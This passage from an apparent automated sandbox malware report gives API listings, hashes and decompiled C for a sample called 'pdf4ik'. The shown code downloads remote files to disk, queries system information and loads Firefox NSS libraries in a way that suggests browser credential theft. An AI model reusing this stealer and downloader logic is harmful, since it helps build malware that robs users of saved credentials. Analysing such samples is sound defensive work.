                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 29DA3E89
                                        • VariantInit.OLEAUT32(?), ref: 29DA3EF9
                                          • Part of subcall function 29DA3D50: CoCreateInstance.OLE32(29DC57A0,00000000,00000001,29DD09A4,?,00000010,00000000,?,29DA3F26,?), ref: 29DA3D6E
                                          • Part of subcall function 29DA3D50: SysAllocString.OLEAUT32(29DA3F26), ref: 29DA3D7C
                                          • Part of subcall function 29DA3D50: SysFreeString.OLEAUT32(29DA3F26), ref: 29DA3DCE
                                          • Part of subcall function 29DA3D50: SysFreeString.OLEAUT32(?), ref: 29DA3DD4
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 29DA3F30
                                        • GetProcessHeap.KERNEL32 ref: 29DA3F36
                                        • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 29DA3F43
                                        • wsprintfA.USER32 ref: 29DA3F6F
                                        • VariantClear.OLEAUT32(?), ref: 29DA3F7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystemwsprintf
                                        • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$WQL
                                        • API String ID: 3748038148-271508173
                                        • Opcode ID: 216257aa41bb5928c837ade9a323ed24dc0b846422c251d5b1bbcbb0d71c20af
                                        • Instruction ID: dfd4a3d1ddb88e7b50e1d7f76cea645e6981e2becc4ee7e988ca893a8c284e47
                                        • Opcode Fuzzy Hash: 216257aa41bb5928c837ade9a323ed24dc0b846422c251d5b1bbcbb0d71c20af
                                        • Instruction Fuzzy Hash: 355124B2904259BFDB10DFA4CCC8EAEB7BCFB58704F508619F105AB284D674AD06DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E29D97E40(void* __ecx, CHAR* _a4) {
                                        				signed int _v8;
                                        				void _v264;
                                        				void _v1288;
                                        				long _v1292;
                                        				void* _v1296;
                                        				char* _v1300;
                                        				long _v1304;
                                        				CHAR* _v1308;
                                        				long _v1312;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t26;
                                        				void* _t36;
                                        				long _t43;
                                        				void* _t49;
                                        				void* _t61;
                                        				void* _t62;
                                        				signed int _t63;
                                        
                                        				_t26 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t26 ^ _t63;
                                        				_t61 = 0;
                                        				_t62 = __ecx;
                                        				_v1308 = _a4;
                                        				_v1300 = 0;
                                        				_v1304 = 0x100;
                                        				_t49 = InternetOpenA(0x29dcd617, 1, 0, 0, 0);
                                        				if(_t49 != 0) {
                                        					_push("https");
                                        					_push(E29D97DC0(_t49, 0, __ecx));
                                        					if( *0x29dd8550() == 0) {
                                        						_v1300 = 1;
                                        					}
                                        					_v1296 = _t61;
                                        					do {
                                        						_push(0);
                                        						if(_v1300 == 0) {
                                        							_push(0x100);
                                        						} else {
                                        							_push(0x800100);
                                        						}
                                        						_t61 = InternetOpenUrlA(_t49, _t62, 0, 0, ??, ??);
                                        						if(HttpQueryInfoA(_t61, 0x13,  &_v264,  &_v1304, 0) == 0) {
                                        							goto L10;
                                        						} else {
                                        							_push("200");
                                        							_push( &_v264);
                                        							if( *0x29dd8550() != 0) {
                                        								Sleep(0x3e8);
                                        								goto L10;
                                        							}
                                        						}
                                        						break;
                                        						L10:
                                        						_t36 = _v1296 + 1;
                                        						_v1296 = _t36;
                                        					} while (_t36 < 3);
                                        					_t62 = CreateFileA(_v1308, 0x40000000, 3, 0, 2, 0x80, 0);
                                        					if(InternetReadFile(_t61,  &_v1288, 0x400,  &_v1292) != 0) {
                                        						do {
                                        							_t43 = _v1292;
                                        							if(_t43 == 0) {
                                        								goto L15;
                                        							} else {
                                        								if(WriteFile(_t62,  &_v1288, _t43,  &_v1312, 0) != 0) {
                                        									_t43 = _v1292;
                                        									if(_t43 == _v1312) {
                                        										goto L15;
                                        									}
                                        								}
                                        							}
                                        							goto L17;
                                        							L15:
                                        						} while (_t43 >= 0x400 && InternetReadFile(_t61,  &_v1288, 0x400,  &_v1292) != 0);
                                        					}
                                        					L17:
                                        					_t57 =  &_v1288;
                                        					E29DB5640( &_v1288, 0, 0x400);
                                        					CloseHandle(_t62);
                                        					InternetCloseHandle(_t61);
                                        					_t29 = InternetCloseHandle(_t49);
                                        				}
                                        				return E29DADF46(_t29, _t49, _v8 ^ _t63, _t57, _t61, _t62);
                                        			}


                                        APIs
                                        • InternetOpenA.WININET(29DCD617,00000001,00000000,00000000,00000000), ref: 29D97E7D
                                          • Part of subcall function 29D97DC0: _memset.LIBCMT ref: 29D97DDB
                                          • Part of subcall function 29D97DC0: _memset.LIBCMT ref: 29D97DE8
                                          • Part of subcall function 29D97DC0: lstrlenA.KERNEL32(00000000,10000000,?), ref: 29D97E0E
                                          • Part of subcall function 29D97DC0: InternetCrackUrlA.WININET(00000000,00000000), ref: 29D97E16
                                        • StrCmpCA.SHLWAPI(00000000,https), ref: 29D97E98
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 29D97ECF
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 29D97EEA
                                        • StrCmpCA.SHLWAPI(?,200), ref: 29D97F00
                                        • Sleep.KERNEL32(000003E8), ref: 29D97F0F
                                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 29D97F40
                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 29D97F5C
                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 29D97F82
                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 29D97FB5
                                        • _memset.LIBCMT ref: 29D97FCD
                                        • CloseHandle.KERNEL32(00000000), ref: 29D97FD6
                                        • InternetCloseHandle.WININET(00000000), ref: 29D97FDD
                                        • InternetCloseHandle.WININET(00000000), ref: 29D97FE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$File$CloseHandle_memset$OpenRead$CrackCreateHttpInfoQuerySleepWritelstrlen
                                        • String ID: 200$https
                                        • API String ID: 107165592-2945048398
                                        • Opcode ID: 6611cac664ba6226601336960de023f69e6f7fbc41452b1abace362989dc7724
                                        • Instruction ID: de3b98d16bea82bc0495d938741315ddccb7bb8e4b04986c5383d82fb63f1cd5
                                        • Opcode Fuzzy Hash: 6611cac664ba6226601336960de023f69e6f7fbc41452b1abace362989dc7724
                                        • Instruction Fuzzy Hash: C4418471650618ABE721AF61CC85FEF7778EF45B01F004498F609E7180EBB49A859F70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • lstrlenA.KERNEL32(00000000,?,29DAC942,?,?), ref: 29DABB52
                                        • StrCmpCA.SHLWAPI(?,29DD0AF4,?,?), ref: 29DABB7D
                                        • StrCmpCA.SHLWAPI(?,.zip,?,?), ref: 29DABB91
                                        • StrCmpCA.SHLWAPI(?,.zoo,?,?), ref: 29DABBA1
                                        • StrCmpCA.SHLWAPI(?,.arc,?,?), ref: 29DABBB1
                                        • StrCmpCA.SHLWAPI(?,.lzh,?,?), ref: 29DABBC1
                                        • StrCmpCA.SHLWAPI(?,.arj,?,?), ref: 29DABBD1
                                        • StrCmpCA.SHLWAPI(?,.gz,?,?), ref: 29DABBE1
                                        • StrCmpCA.SHLWAPI(?,.tgz,?,?), ref: 29DABBF1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                        • API String ID: 1659193697-51310709
                                        • Opcode ID: c314af00ac9a7d4aac4057f5332085f624aeacb8f4d8ee39194fedde9f018f7f
                                        • Instruction ID: a8affcb61d0e1f9330a3e4872c7ffa16b08d2eb8e595cc906f055106b46a6398
                                        • Opcode Fuzzy Hash: c314af00ac9a7d4aac4057f5332085f624aeacb8f4d8ee39194fedde9f018f7f
                                        • Instruction Fuzzy Hash: 27112F33281D916697473F25AC48EEB3B58AF51A55781816CF480E180DEB1CC457B3B5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E29D936D0() {
                                        				long _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				intOrPtr _v28;
                                        				char _v48;
                                        				intOrPtr _v56;
                                        				long _v60;
                                        				char _v76;
                                        				long _v84;
                                        				char _v380;
                                        				long _v384;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t91;
                                        				signed int _t92;
                                        				intOrPtr* _t94;
                                        				void* _t96;
                                        				intOrPtr* _t100;
                                        				intOrPtr* _t101;
                                        				intOrPtr* _t108;
                                        				intOrPtr* _t109;
                                        				intOrPtr* _t114;
                                        				intOrPtr* _t115;
                                        				intOrPtr* _t122;
                                        				intOrPtr* _t123;
                                        				intOrPtr* _t130;
                                        				intOrPtr* _t131;
                                        				intOrPtr* _t136;
                                        				intOrPtr* _t137;
                                        				long _t150;
                                        				void* _t151;
                                        				intOrPtr _t158;
                                        				void* _t196;
                                        				void* _t198;
                                        				void* _t199;
                                        				intOrPtr* _t200;
                                        				intOrPtr* _t201;
                                        				intOrPtr* _t202;
                                        				intOrPtr* _t203;
                                        				intOrPtr* _t204;
                                        				intOrPtr* _t205;
                                        				signed int _t206;
                                        				void* _t207;
                                        				void* _t208;
                                        				void* _t210;
                                        				void* _t211;
                                        				void* _t212;
                                        				void* _t213;
                                        				void* _t214;
                                        				void* _t215;
                                        				void* _t216;
                                        				void* _t217;
                                        				void* _t218;
                                        				void* _t219;
                                        				void* _t220;
                                        				void* _t223;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC4128);
                                        				_push( *[fs:0x0]);
                                        				_t208 = _t207 - 0x174;
                                        				_t91 =  *0x29dd5664; // 0xd9555f04
                                        				_t92 = _t91 ^ _t206;
                                        				_v20 = _t92;
                                        				_push(_t92);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t180 =  *0x29dd8098; // 0x15a1f98
                                        				_t150 = 0;
                                        				_t94 = _t180;
                                        				_v56 = 0xf;
                                        				_v60 = 0;
                                        				_v76 = 0;
                                        				_t6 = _t94 + 1; // 0x15a1f99
                                        				_t198 = _t6;
                                        				do {
                                        					_t158 =  *_t94;
                                        					_t94 = _t94 + 1;
                                        				} while (_t158 != 0);
                                        				_t96 = E29D892C0( &_v76, _t180, _t94 - _t198);
                                        				_v8 = 0;
                                        				_t223 =  *0x29dd86f8 - _t150; // 0x0
                                        				if(_t223 != 0) {
                                        					L64:
                                        					if(_v56 >= 0x10) {
                                        						_push(_v76);
                                        						_t96 = E29DADF3B();
                                        					}
                                        					 *[fs:0x0] = _v16;
                                        					_pop(_t196);
                                        					_pop(_t199);
                                        					_pop(_t151);
                                        					return E29DADF46(_t96, _t151, _v20 ^ _t206, _t180, _t196, _t199);
                                        				} else {
                                        					_t100 = E29D95460( &_v48,  &_v76, "vcruntime140.dll");
                                        					_t210 = _t208 + 0xc;
                                        					_v8 = 1;
                                        					if( *((intOrPtr*)(_t100 + 0x14)) < 0x10) {
                                        						_t200 = _t100;
                                        					} else {
                                        						_t200 =  *_t100;
                                        					}
                                        					_t101 =  *0x29dd82dc; // 0x0
                                        					_v384 = _t150;
                                        					if(_t101 != _t150) {
                                        						if( *_t101 == 1) {
                                        							 *0x29dd86b0 = E29D8DE50( &_v384,  &_v380,  *((intOrPtr*)(_t101 + 4)), "vcruntime140.dll");
                                        							_t150 = 0;
                                        						} else {
                                        							 *0x29dd86b0 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd86b0 = 0x10000;
                                        					}
                                        					HeapAlloc(GetProcessHeap(), _t150, _v84);
                                        					E29D8E4F0(_v84, _v384, _t200);
                                        					_t211 = _t210 + 8;
                                        					_v8 = _t150;
                                        					if(_v28 >= 0x10) {
                                        						_push(_v48);
                                        						E29DADF3B();
                                        						_t211 = _t211 + 4;
                                        					}
                                        					_t108 = E29D95460( &_v48,  &_v76, "softokn3.dll");
                                        					_t212 = _t211 + 0xc;
                                        					_v8 = 2;
                                        					if( *((intOrPtr*)(_t108 + 0x14)) < 0x10) {
                                        						_t201 = _t108;
                                        					} else {
                                        						_t201 =  *_t108;
                                        					}
                                        					_t109 =  *0x29dd82dc; // 0x0
                                        					_v384 = _t150;
                                        					if(_t109 != _t150) {
                                        						if( *_t109 == 1) {
                                        							 *0x29dd86b0 = E29D8DE50( &_v384,  &_v380,  *((intOrPtr*)(_t109 + 4)), "softokn3.dll");
                                        							_t150 = 0;
                                        						} else {
                                        							 *0x29dd86b0 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd86b0 = 0x10000;
                                        					}
                                        					HeapAlloc(GetProcessHeap(), _t150, _v84);
                                        					E29D8E4F0(_v384, _v384, _t201);
                                        					_t213 = _t212 + 8;
                                        					_v8 = _t150;
                                        					if(_v28 >= 0x10) {
                                        						_push(_v48);
                                        						E29DADF3B();
                                        						_t213 = _t213 + 4;
                                        					}
                                        					_t186 =  &_v48;
                                        					_t114 = E29D95460( &_v48,  &_v76, "nss3.dll");
                                        					_t214 = _t213 + 0xc;
                                        					_v8 = 3;
                                        					if( *((intOrPtr*)(_t114 + 0x14)) < 0x10) {
                                        						_t202 = _t114;
                                        					} else {
                                        						_t202 =  *_t114;
                                        					}
                                        					_t115 =  *0x29dd82dc; // 0x0
                                        					_v384 = _t150;
                                        					if(_t115 != _t150) {
                                        						if( *_t115 == 1) {
                                        							_t186 =  *((intOrPtr*)(_t115 + 4));
                                        							 *0x29dd86b0 = E29D8DE50( &_v384,  &_v380,  *((intOrPtr*)(_t115 + 4)), "nss3.dll");
                                        							_t150 = 0;
                                        						} else {
                                        							 *0x29dd86b0 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd86b0 = 0x10000;
                                        					}
                                        					HeapAlloc(GetProcessHeap(), _t150, _v84);
                                        					E29D8E4F0(_t186, _v384, _t202);
                                        					_t215 = _t214 + 8;
                                        					_v8 = _t150;
                                        					if(_v28 >= 0x10) {
                                        						_push(_v48);
                                        						E29DADF3B();
                                        						_t215 = _t215 + 4;
                                        					}
                                        					_t122 = E29D95460( &_v48,  &_v76, "msvcp140.dll");
                                        					_t216 = _t215 + 0xc;
                                        					_v8 = 4;
                                        					if( *((intOrPtr*)(_t122 + 0x14)) < 0x10) {
                                        						_t203 = _t122;
                                        					} else {
                                        						_t203 =  *_t122;
                                        					}
                                        					_t123 =  *0x29dd82dc; // 0x0
                                        					_v384 = _t150;
                                        					if(_t123 != _t150) {
                                        						if( *_t123 == 1) {
                                        							 *0x29dd86b0 = E29D8DE50( &_v384,  &_v380,  *((intOrPtr*)(_t123 + 4)), "msvcp140.dll");
                                        							_t150 = 0;
                                        						} else {
                                        							 *0x29dd86b0 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd86b0 = 0x10000;
                                        					}
                                        					HeapAlloc(GetProcessHeap(), _t150, _v84);
                                        					E29D8E4F0(_v84, _v384, _t203);
                                        					_t217 = _t216 + 8;
                                        					_v8 = _t150;
                                        					if(_v28 >= 0x10) {
                                        						_push(_v48);
                                        						E29DADF3B();
                                        						_t217 = _t217 + 4;
                                        					}
                                        					_t130 = E29D95460( &_v48,  &_v76, "mozglue.dll");
                                        					_t218 = _t217 + 0xc;
                                        					_v8 = 5;
                                        					if( *((intOrPtr*)(_t130 + 0x14)) < 0x10) {
                                        						_t204 = _t130;
                                        					} else {
                                        						_t204 =  *_t130;
                                        					}
                                        					_t131 =  *0x29dd82dc; // 0x0
                                        					_v384 = _t150;
                                        					if(_t131 != _t150) {
                                        						if( *_t131 == 1) {
                                        							 *0x29dd86b0 = E29D8DE50( &_v384,  &_v380,  *((intOrPtr*)(_t131 + 4)), "mozglue.dll");
                                        							_t150 = 0;
                                        						} else {
                                        							 *0x29dd86b0 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd86b0 = 0x10000;
                                        					}
                                        					HeapAlloc(GetProcessHeap(), _t150, _v84);
                                        					E29D8E4F0(_v384, _v384, _t204);
                                        					_t219 = _t218 + 8;
                                        					_v8 = _t150;
                                        					if(_v28 >= 0x10) {
                                        						_push(_v48);
                                        						E29DADF3B();
                                        						_t219 = _t219 + 4;
                                        					}
                                        					_t136 = E29D95460( &_v48,  &_v76, "freebl3.dll");
                                        					_t220 = _t219 + 0xc;
                                        					_v8 = 6;
                                        					if( *((intOrPtr*)(_t136 + 0x14)) < 0x10) {
                                        						_t205 = _t136;
                                        					} else {
                                        						_t205 =  *_t136;
                                        					}
                                        					_t137 =  *0x29dd82dc; // 0x0
                                        					_v384 = _t150;
                                        					if(_t137 != _t150) {
                                        						if( *_t137 == 1) {
                                        							_t180 =  *((intOrPtr*)(_t137 + 4));
                                        							 *0x29dd86b0 = E29D8DE50( &_v384,  &_v380,  *((intOrPtr*)(_t137 + 4)), "freebl3.dll");
                                        							_t150 = 0;
                                        						} else {
                                        							 *0x29dd86b0 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd86b0 = 0x10000;
                                        					}
                                        					HeapAlloc(GetProcessHeap(), _t150, _v84);
                                        					_t96 = E29D8E4F0(_t180, _v384, _t205);
                                        					_t208 = _t220 + 8;
                                        					if(_v28 >= 0x10) {
                                        						_t180 = _v48;
                                        						_push(_v48);
                                        						_t96 = E29DADF3B();
                                        						_t208 = _t208 + 4;
                                        					}
                                        					 *0x29dd86f8 = 1;
                                        					goto L64;
                                        				}
                                        			}

                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 29D937B4
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D937BB
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 29D9385A
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D93861
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 29D93900
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D93907
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 29D939A6
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D939AD
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 29D93A4C
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D93A53
                                          • Part of subcall function 29D8DE50: _memset.LIBCMT ref: 29D8DEB4
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 29D93AF2
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D93AF9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocProcess$_memset
                                        • String ID: freebl3.dll$mozglue.dll$msvcp140.dll$nss3.dll$softokn3.dll$vcruntime140.dll
                                        • API String ID: 2726902320-1377252038
                                        • Opcode ID: 3a91c341b65c9d1877077539fb8293640dbc606a351a856cab48c10ddbf246f4
                                        • Instruction ID: d86c429d2fb7a98f49122360157166e28af913a9b31d8db7834603f04f5a7bd1
                                        • Opcode Fuzzy Hash: 3a91c341b65c9d1877077539fb8293640dbc606a351a856cab48c10ddbf246f4
                                        • Instruction Fuzzy Hash: 3ED1C1B2D14284EFDB01EFA4D884ACEBBB4BF19744F00C1ADD50967601D735A94AEFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E29D9F960(void* __ebx, void* __edi) {
                                        				signed int _v8;
                                        				char _v5008;
                                        				void* __esi;
                                        				signed int _t12;
                                        				CHAR* _t25;
                                        				struct HINSTANCE__* _t26;
                                        				_Unknown_base(*)()* _t29;
                                        				struct HINSTANCE__* _t30;
                                        				_Unknown_base(*)()* _t31;
                                        				_Unknown_base(*)()* _t32;
                                        				CHAR* _t33;
                                        				_Unknown_base(*)()* _t34;
                                        				struct HINSTANCE__* _t35;
                                        				_Unknown_base(*)()* _t36;
                                        				void* _t38;
                                        				CHAR* _t45;
                                        				CHAR* _t46;
                                        				struct HINSTANCE__* _t47;
                                        				CHAR* _t48;
                                        				CHAR* _t51;
                                        				struct HINSTANCE__* _t52;
                                        				CHAR* _t53;
                                        				void* _t54;
                                        				CHAR* _t55;
                                        				signed int _t56;
                                        
                                        				_t54 = __edi;
                                        				_t38 = __ebx;
                                        				E29DBCDB0(0x138c);
                                        				_t12 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t12 ^ _t56;
                                        				_t55 =  *0x29dd8098; // 0x15a1f98
                                        				if(_t55 == 0) {
                                        					L10:
                                        					return E29DADF46(0, _t38, _v8 ^ _t56, _t49, _t54, _t55);
                                        				} else {
                                        					GetEnvironmentVariableA("PATH", 0x29dd9030, 0xffff);
                                        					E29DB5640( &_v5008, 0, 0x1388);
                                        					lstrcatA( &_v5008, 0x29dd9030);
                                        					lstrcatA( &_v5008, ";");
                                        					lstrcatA( &_v5008, _t55);
                                        					SetEnvironmentVariableA("PATH",  &_v5008);
                                        					_t49 =  &_v5008;
                                        					E29DB5640( &_v5008, 0, 0x1388);
                                        					_t25 =  *0x29dd8194; // 0x159c9f0
                                        					_t26 = LoadLibraryA(_t25);
                                        					 *0x29dd833c = _t26;
                                        					if(_t26 != 0) {
                                        						_t45 =  *0x29dd7d18; // 0x15a2670
                                        						_t29 = GetProcAddress(_t26, _t45);
                                        						_t51 =  *0x29dd80f8; // 0x15a24f0
                                        						 *0x29dd8330 = _t29;
                                        						_t30 =  *0x29dd833c; // 0x0
                                        						_t31 = GetProcAddress(_t30, _t51);
                                        						_t46 =  *0x29dd7c14; // 0x159c6d0
                                        						_t52 =  *0x29dd833c; // 0x0
                                        						 *0x29dd834c = _t31;
                                        						_t32 = GetProcAddress(_t52, _t46);
                                        						_t47 =  *0x29dd833c; // 0x0
                                        						 *0x29dd82fc = _t32;
                                        						_t33 =  *0x29dd7b4c; // 0x15a26b8
                                        						_t34 = GetProcAddress(_t47, _t33);
                                        						_t53 =  *0x29dd82ac; // 0x159c770
                                        						 *0x29dd8324 = _t34;
                                        						_t35 =  *0x29dd833c; // 0x0
                                        						_t36 = GetProcAddress(_t35, _t53);
                                        						_t48 =  *0x29dd7dc0; // 0x15a2400
                                        						_t49 =  *0x29dd833c; // 0x0
                                        						 *0x29dd8340 = _t36;
                                        						 *0x29dd831c = GetProcAddress(_t49, _t48);
                                        					}
                                        					if( *0x29dd8330 == 0 ||  *0x29dd834c == 0 ||  *0x29dd82fc == 0 ||  *0x29dd8340 == 0 ||  *0x29dd831c == 0 ||  *0x29dd8324 == 0) {
                                        						goto L10;
                                        					} else {
                                        						return E29DADF46(1, _t38, _v8 ^ _t56, _t49, _t54, _t55);
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • GetEnvironmentVariableA.KERNEL32(PATH,29DD9030,0000FFFF,01596F20,?,29D9FC97), ref: 29D9F995
                                        • _memset.LIBCMT ref: 29D9F9A9
                                        • lstrcatA.KERNEL32(?,29DD9030,?,?,29D9FC97), ref: 29D9F9BD
                                        • lstrcatA.KERNEL32(?,29DCFA80,?,?,29D9FC97), ref: 29D9F9CF
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,29D9FC97), ref: 29D9F9DD
                                        • SetEnvironmentVariableA.KERNEL32(PATH,?,?,?,29D9FC97), ref: 29D9F9EF
                                        • _memset.LIBCMT ref: 29D9FA03
                                        • LoadLibraryA.KERNEL32(0159C9F0,?,?,?,?,?,29D9FC97), ref: 29D9FA11
                                        • GetProcAddress.KERNEL32(00000000,015A2670), ref: 29D9FA2C
                                        • GetProcAddress.KERNEL32(00000000,015A24F0), ref: 29D9FA44
                                        • GetProcAddress.KERNEL32(00000000,0159C6D0), ref: 29D9FA5D
                                        • GetProcAddress.KERNEL32(00000000,015A26B8), ref: 29D9FA75
                                        • GetProcAddress.KERNEL32(00000000,0159C770), ref: 29D9FA8D
                                        • GetProcAddress.KERNEL32(00000000,015A2400), ref: 29D9FAA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$lstrcat$EnvironmentVariable_memset$LibraryLoad
                                        • String ID: PATH
                                        • API String ID: 3772005587-1036084923
                                        • Opcode ID: 69a55b55cff43c20e66902d5b2039219018e7bfc8529b2a69a2735790f71a7d8
                                        • Instruction ID: 26a5cbb37ce826dfa9f2caa0af65dbcb6858f81d1603f8f242f1eb23b4cbba71
                                        • Opcode Fuzzy Hash: 69a55b55cff43c20e66902d5b2039219018e7bfc8529b2a69a2735790f71a7d8
                                        • Instruction Fuzzy Hash: D5414CB7590280ABD716FBA8E848EA537F8AF48B40F00C159F509D7640DB785906EBB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E29DA8210() {
                                        				CHAR* _t1;
                                        				struct HINSTANCE__* _t2;
                                        				struct HINSTANCE__* _t3;
                                        				_Unknown_base(*)()* _t4;
                                        				_Unknown_base(*)()* _t5;
                                        				struct HINSTANCE__* _t6;
                                        				_Unknown_base(*)()* _t7;
                                        				intOrPtr _t8;
                                        				CHAR* _t9;
                                        				_Unknown_base(*)()* _t10;
                                        				struct HINSTANCE__* _t11;
                                        				_Unknown_base(*)()* _t12;
                                        				_Unknown_base(*)()* _t13;
                                        				CHAR* _t14;
                                        				_Unknown_base(*)()* _t15;
                                        				struct HINSTANCE__* _t16;
                                        				_Unknown_base(*)()* _t17;
                                        				_Unknown_base(*)()* _t18;
                                        				CHAR* _t19;
                                        				_Unknown_base(*)()* _t20;
                                        				struct HINSTANCE__* _t21;
                                        				_Unknown_base(*)()* _t22;
                                        				_Unknown_base(*)()* _t23;
                                        				CHAR* _t24;
                                        				CHAR* _t26;
                                        				CHAR* _t27;
                                        				intOrPtr _t28;
                                        				struct HINSTANCE__* _t29;
                                        				CHAR* _t30;
                                        				struct HINSTANCE__* _t31;
                                        				CHAR* _t32;
                                        				struct HINSTANCE__* _t33;
                                        				CHAR* _t34;
                                        				struct HINSTANCE__* _t35;
                                        				CHAR* _t36;
                                        				CHAR* _t37;
                                        				struct HINSTANCE__* _t38;
                                        				CHAR* _t39;
                                        				struct HINSTANCE__* _t40;
                                        				CHAR* _t41;
                                        				struct HINSTANCE__* _t42;
                                        				CHAR* _t43;
                                        				struct HINSTANCE__* _t44;
                                        				void* _t45;
                                        
                                        				_t1 =  *0x29dd7b74; // 0x159a540
                                        				_t2 = LoadLibraryA(_t1);
                                        				 *0x29dd856c = _t2;
                                        				if(_t2 != 0) {
                                        					_t27 =  *0x29dd7c58; // 0x159a6a8
                                        					_t5 = GetProcAddress(_t2, _t27);
                                        					_t37 =  *0x29dd7f0c; // 0x159a4f8
                                        					 *0x29dd8514 = _t5;
                                        					_t6 =  *0x29dd856c; // 0x74ab0000
                                        					_t7 = GetProcAddress(_t6, _t37);
                                        					_t28 =  *0x29dd821c; // 0x159a7e0
                                        					_t38 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8474 = _t7;
                                        					_t8 =  *_t7(_t38, _t28, _t45);
                                        					_t29 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8520 = _t8;
                                        					_t9 =  *0x29dd7da0; // 0x159e2c8
                                        					_t10 = GetProcAddress(_t29, _t9);
                                        					_t39 =  *0x29dd7ae4; // 0x159a6d8
                                        					 *0x29dd8390 = _t10;
                                        					_t11 =  *0x29dd856c; // 0x74ab0000
                                        					_t12 = GetProcAddress(_t11, _t39);
                                        					_t30 =  *0x29dd82c0; // 0x159a5d0
                                        					_t40 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd84bc = _t12;
                                        					_t13 = GetProcAddress(_t40, _t30);
                                        					_t31 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8484 = _t13;
                                        					_t14 =  *0x29dd7c80; // 0x159caf0
                                        					_t15 = GetProcAddress(_t31, _t14);
                                        					_t41 =  *0x29dd7de0; // 0x159ca70
                                        					 *0x29dd859c = _t15;
                                        					_t16 =  *0x29dd856c; // 0x74ab0000
                                        					_t17 = GetProcAddress(_t16, _t41);
                                        					_t32 =  *0x29dd7ebc; // 0x159a768
                                        					_t42 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8554 = _t17;
                                        					_t18 = GetProcAddress(_t42, _t32);
                                        					_t33 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd84cc = _t18;
                                        					_t19 =  *0x29dd81d8; // 0x159a720
                                        					_t20 = GetProcAddress(_t33, _t19);
